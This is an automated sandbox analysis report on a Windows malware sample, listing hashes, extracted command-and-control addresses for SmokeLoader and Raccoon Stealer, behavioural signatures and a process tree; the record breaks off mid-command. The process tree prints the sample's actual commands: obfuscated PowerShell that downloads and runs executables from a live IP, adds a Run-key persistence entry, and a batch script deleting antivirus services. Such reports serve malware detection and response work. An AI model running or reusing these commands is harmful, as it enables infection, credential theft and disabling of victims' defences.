Analysis
-
max time kernel
151s -
max time network
144s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
13-08-2021 06:43
Static task
static1
Behavioral task
behavioral1
Sample
762a6aad9e19cfdc94653d3cdf7ad24c.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
762a6aad9e19cfdc94653d3cdf7ad24c.exe
Resource
win10v20210410
General
-
Target
762a6aad9e19cfdc94653d3cdf7ad24c.exe
-
Size
310KB
-
MD5
762a6aad9e19cfdc94653d3cdf7ad24c
-
SHA1
a7c10d06cad6498c5a525ee6ec4565439a55ca34
-
SHA256
c8dc6ed0d081d67f6b686a19ca7f5e211eb502dec5b287cd85b6a37035f20bd7
-
SHA512
11b05afe0aa9c9b4383458f29b39a178a25320991fd5ba7df1dccec205fe1ca7c228ca5faa688abc65c5e1c3e4aed15147aa01108e6b7cb154f1f0ab5bc8613f
Malware Config
Extracted
http://193.56.146.55/Api/GetFile2
Extracted
smokeloader
2020
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Extracted
raccoon
471c70de3b4f9e4d493e418d1f60a90659057de0
-
url4cnc
https://telete.in/p1rosto100xx
Extracted
raccoon
cd8dc1031358b1aec55cc6bc447df1018b068607
-
url4cnc
https://telete.in/jagressor_kz
Signatures
-
Raccoon Stealer Payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/3908-188-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon behavioral2/memory/3908-191-0x000000000044003F-mapping.dmp family_raccoon behavioral2/memory/3908-202-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon behavioral2/memory/496-231-0x00000000048A0000-0x0000000004931000-memory.dmp family_raccoon behavioral2/memory/496-243-0x0000000000400000-0x0000000002CA9000-memory.dmp family_raccoon -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 2080 created 496 2080 WerFault.exe 2F42.exe -
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 201 3996 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 7 IoCs
Processes:
CFC9.exeD1FC.exeD420.exeD951.exeRuntimebroker.exeD420.exe2F42.exepid process 3252 CFC9.exe 3412 D1FC.exe 3732 D420.exe 1192 D951.exe 784 Runtimebroker.exe 3908 D420.exe 496 2F42.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
D951.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion D951.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion D951.exe -
Deletes itself 1 IoCs
Processes:
pid process 2832 -
Drops startup file 3 IoCs
Processes:
cmd.exeRuntimebroker.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk Runtimebroker.exe -
Loads dropped DLL 1 IoCs
Processes:
D420.exepid process 3908 D420.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\D951.exe themida C:\Users\Admin\AppData\Local\Temp\D951.exe themida behavioral2/memory/1192-139-0x0000000000BB0000-0x0000000000BB1000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://193.56.146.55/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')" powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
D951.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA D951.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
D951.exepid process 1192 D951.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
762a6aad9e19cfdc94653d3cdf7ad24c.exeD420.exedescription pid process target process PID 3988 set thread context of 2440 3988 762a6aad9e19cfdc94653d3cdf7ad24c.exe 762a6aad9e19cfdc94653d3cdf7ad24c.exe PID 3732 set thread context of 3908 3732 D420.exe D420.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 18 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2100 3252 WerFault.exe CFC9.exe 2080 3252 WerFault.exe CFC9.exe 2756 3252 WerFault.exe CFC9.exe 2484 3252 WerFault.exe CFC9.exe 2040 3252 WerFault.exe CFC9.exe 1944 3252 WerFault.exe CFC9.exe 1144 784 WerFault.exe Runtimebroker.exe 192 784 WerFault.exe Runtimebroker.exe 496 784 WerFault.exe Runtimebroker.exe 3788 784 WerFault.exe Runtimebroker.exe 1584 784 WerFault.exe Runtimebroker.exe 3448 784 WerFault.exe Runtimebroker.exe 2176 3908 WerFault.exe D420.exe 2500 496 WerFault.exe 2F42.exe 4064 496 WerFault.exe 2F42.exe 4060 496 WerFault.exe 2F42.exe 2492 496 WerFault.exe 2F42.exe 2080 496 WerFault.exe 2F42.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
762a6aad9e19cfdc94653d3cdf7ad24c.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 762a6aad9e19cfdc94653d3cdf7ad24c.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 762a6aad9e19cfdc94653d3cdf7ad24c.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 762a6aad9e19cfdc94653d3cdf7ad24c.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
762a6aad9e19cfdc94653d3cdf7ad24c.exepid process 2440 762a6aad9e19cfdc94653d3cdf7ad24c.exe 2440 762a6aad9e19cfdc94653d3cdf7ad24c.exe 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2832 -
Suspicious behavior: MapViewOfSection 19 IoCs
Processes:
762a6aad9e19cfdc94653d3cdf7ad24c.exepid process 2440 762a6aad9e19cfdc94653d3cdf7ad24c.exe 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 2832 -
Suspicious use of AdjustPrivilegeToken 56 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeD951.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepowershell.exeD420.exepowershell.exeWerFault.exepowershell.exeWerFault.exeWerFault.execmd.exeWerFault.exeWerFault.exedescription pid process Token: SeRestorePrivilege 2100 WerFault.exe Token: SeBackupPrivilege 2100 WerFault.exe Token: SeDebugPrivilege 2100 WerFault.exe Token: SeShutdownPrivilege 2832 Token: SeCreatePagefilePrivilege 2832 Token: SeShutdownPrivilege 2832 Token: SeCreatePagefilePrivilege 2832 Token: SeShutdownPrivilege 2832 Token: SeCreatePagefilePrivilege 2832 Token: SeDebugPrivilege 2080 WerFault.exe Token: SeShutdownPrivilege 2832 Token: SeCreatePagefilePrivilege 2832 Token: SeDebugPrivilege 2756 WerFault.exe Token: SeDebugPrivilege 2484 WerFault.exe Token: SeDebugPrivilege 2040 WerFault.exe Token: SeDebugPrivilege 1192 D951.exe Token: SeDebugPrivilege 1944 WerFault.exe Token: SeDebugPrivilege 1144 WerFault.exe Token: SeDebugPrivilege 192 WerFault.exe Token: SeDebugPrivilege 496 WerFault.exe Token: SeDebugPrivilege 3788 WerFault.exe Token: SeShutdownPrivilege 2832 Token: SeCreatePagefilePrivilege 2832 Token: SeDebugPrivilege 1584 WerFault.exe Token: SeDebugPrivilege 1340 powershell.exe Token: SeDebugPrivilege 3732 D420.exe Token: SeDebugPrivilege 3996 powershell.exe Token: SeShutdownPrivilege 2832 Token: SeCreatePagefilePrivilege 2832 Token: SeShutdownPrivilege 2832 Token: SeCreatePagefilePrivilege 2832 Token: SeShutdownPrivilege 2832 Token: SeCreatePagefilePrivilege 2832 Token: SeShutdownPrivilege 2832 Token: SeCreatePagefilePrivilege 2832 Token: SeShutdownPrivilege 2832 Token: SeCreatePagefilePrivilege 2832 Token: SeDebugPrivilege 2176 WerFault.exe Token: SeShutdownPrivilege 2832 Token: SeCreatePagefilePrivilege 2832 Token: SeShutdownPrivilege 2832 Token: SeCreatePagefilePrivilege 2832 Token: SeDebugPrivilege 4020 powershell.exe Token: SeDebugPrivilege 2500 WerFault.exe Token: SeDebugPrivilege 4064 WerFault.exe Token: SeDebugPrivilege 4060 cmd.exe Token: SeDebugPrivilege 2492 WerFault.exe Token: SeDebugPrivilege 2080 WerFault.exe Token: SeShutdownPrivilege 2832 Token: SeCreatePagefilePrivilege 2832 Token: SeShutdownPrivilege 2832 Token: SeCreatePagefilePrivilege 2832 Token: SeShutdownPrivilege 2832 Token: SeCreatePagefilePrivilege 2832 Token: SeShutdownPrivilege 2832 Token: SeCreatePagefilePrivilege 2832 -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 2832 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
762a6aad9e19cfdc94653d3cdf7ad24c.exeCFC9.exeD1FC.exeRuntimebroker.exeD420.exepowershell.exedescription pid process target process PID 3988 wrote to memory of 2440 3988 762a6aad9e19cfdc94653d3cdf7ad24c.exe 762a6aad9e19cfdc94653d3cdf7ad24c.exe PID 3988 wrote to memory of 2440 3988 762a6aad9e19cfdc94653d3cdf7ad24c.exe 762a6aad9e19cfdc94653d3cdf7ad24c.exe PID 3988 wrote to memory of 2440 3988 762a6aad9e19cfdc94653d3cdf7ad24c.exe 762a6aad9e19cfdc94653d3cdf7ad24c.exe PID 3988 wrote to memory of 2440 3988 762a6aad9e19cfdc94653d3cdf7ad24c.exe 762a6aad9e19cfdc94653d3cdf7ad24c.exe PID 3988 wrote to memory of 2440 3988 762a6aad9e19cfdc94653d3cdf7ad24c.exe 762a6aad9e19cfdc94653d3cdf7ad24c.exe PID 3988 wrote to memory of 2440 3988 762a6aad9e19cfdc94653d3cdf7ad24c.exe 762a6aad9e19cfdc94653d3cdf7ad24c.exe PID 2832 wrote to memory of 3252 2832 CFC9.exe PID 2832 wrote to memory of 3252 2832 CFC9.exe PID 2832 wrote to memory of 3252 2832 CFC9.exe PID 2832 wrote to memory of 3412 2832 D1FC.exe PID 2832 wrote to memory of 3412 2832 D1FC.exe PID 2832 wrote to memory of 3412 2832 D1FC.exe PID 2832 wrote to memory of 3732 2832 D420.exe PID 2832 wrote to memory of 3732 2832 D420.exe PID 2832 wrote to memory of 3732 2832 D420.exe PID 2832 wrote to memory of 1192 2832 D951.exe PID 2832 wrote to memory of 1192 2832 D951.exe PID 2832 wrote to memory of 1192 2832 D951.exe PID 3252 wrote to memory of 784 3252 CFC9.exe Runtimebroker.exe PID 3252 wrote to memory of 784 3252 CFC9.exe Runtimebroker.exe PID 3252 wrote to memory of 784 3252 CFC9.exe Runtimebroker.exe PID 3412 wrote to memory of 3132 3412 D1FC.exe cmd.exe PID 3412 wrote to memory of 3132 3412 D1FC.exe cmd.exe PID 3412 wrote to memory of 3132 3412 D1FC.exe cmd.exe PID 784 wrote to memory of 1340 784 Runtimebroker.exe powershell.exe PID 784 wrote to memory of 1340 784 Runtimebroker.exe powershell.exe PID 784 wrote to memory of 1340 784 Runtimebroker.exe powershell.exe PID 3732 wrote to memory of 3908 3732 D420.exe D420.exe PID 3732 wrote to memory of 3908 3732 D420.exe D420.exe PID 3732 wrote to memory of 3908 3732 D420.exe D420.exe PID 3732 wrote to memory of 3908 3732 D420.exe D420.exe PID 3732 wrote to memory of 3908 3732 D420.exe D420.exe PID 3732 wrote to memory of 3908 3732 D420.exe D420.exe PID 3732 wrote to memory of 3908 3732 D420.exe D420.exe PID 3732 wrote to memory of 3908 3732 D420.exe D420.exe PID 3732 wrote to memory of 3908 3732 D420.exe D420.exe PID 784 wrote to memory of 3996 784 Runtimebroker.exe powershell.exe PID 784 wrote to memory of 3996 784 Runtimebroker.exe powershell.exe PID 784 wrote to memory of 3996 784 Runtimebroker.exe powershell.exe PID 2832 wrote to memory of 496 2832 2F42.exe PID 2832 wrote to memory of 496 2832 2F42.exe PID 2832 wrote to memory of 496 2832 2F42.exe PID 2832 wrote to memory of 3540 2832 explorer.exe PID 2832 wrote to memory of 3540 2832 explorer.exe PID 2832 wrote to memory of 3540 2832 explorer.exe PID 2832 wrote to memory of 3540 2832 explorer.exe PID 3996 wrote to memory of 4020 3996 powershell.exe powershell.exe PID 3996 wrote to memory of 4020 3996 powershell.exe powershell.exe PID 3996 wrote to memory of 4020 3996 powershell.exe powershell.exe PID 2832 wrote to memory of 2040 2832 explorer.exe PID 2832 wrote to memory of 2040 2832 explorer.exe PID 2832 wrote to memory of 2040 2832 explorer.exe PID 2832 wrote to memory of 420 2832 explorer.exe PID 2832 wrote to memory of 420 2832 explorer.exe PID 2832 wrote to memory of 420 2832 explorer.exe PID 2832 wrote to memory of 420 2832 explorer.exe PID 2832 wrote to memory of 3936 2832 explorer.exe PID 2832 wrote to memory of 3936 2832 explorer.exe PID 2832 wrote to memory of 3936 2832 explorer.exe PID 2832 wrote to memory of 2428 2832 explorer.exe PID 2832 wrote to memory of 2428 2832 explorer.exe PID 2832 wrote to memory of 2428 2832 explorer.exe PID 2832 wrote to memory of 2428 2832 explorer.exe PID 2832 wrote to memory of 1624 2832 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\762a6aad9e19cfdc94653d3cdf7ad24c.exe"C:\Users\Admin\AppData\Local\Temp\762a6aad9e19cfdc94653d3cdf7ad24c.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\762a6aad9e19cfdc94653d3cdf7ad24c.exe"C:\Users\Admin\AppData\Local\Temp\762a6aad9e19cfdc94653d3cdf7ad24c.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\CFC9.exeC:\Users\Admin\AppData\Local\Temp\CFC9.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3252 -s 8682⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3252 -s 8802⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3252 -s 9202⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3252 -s 8882⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3252 -s 9562⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3252 -s 8802⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 7323⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 7843⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 7603⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 7963⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 9763⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 10403⤵
- Program crash
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://193.56.146.55/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method3⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v 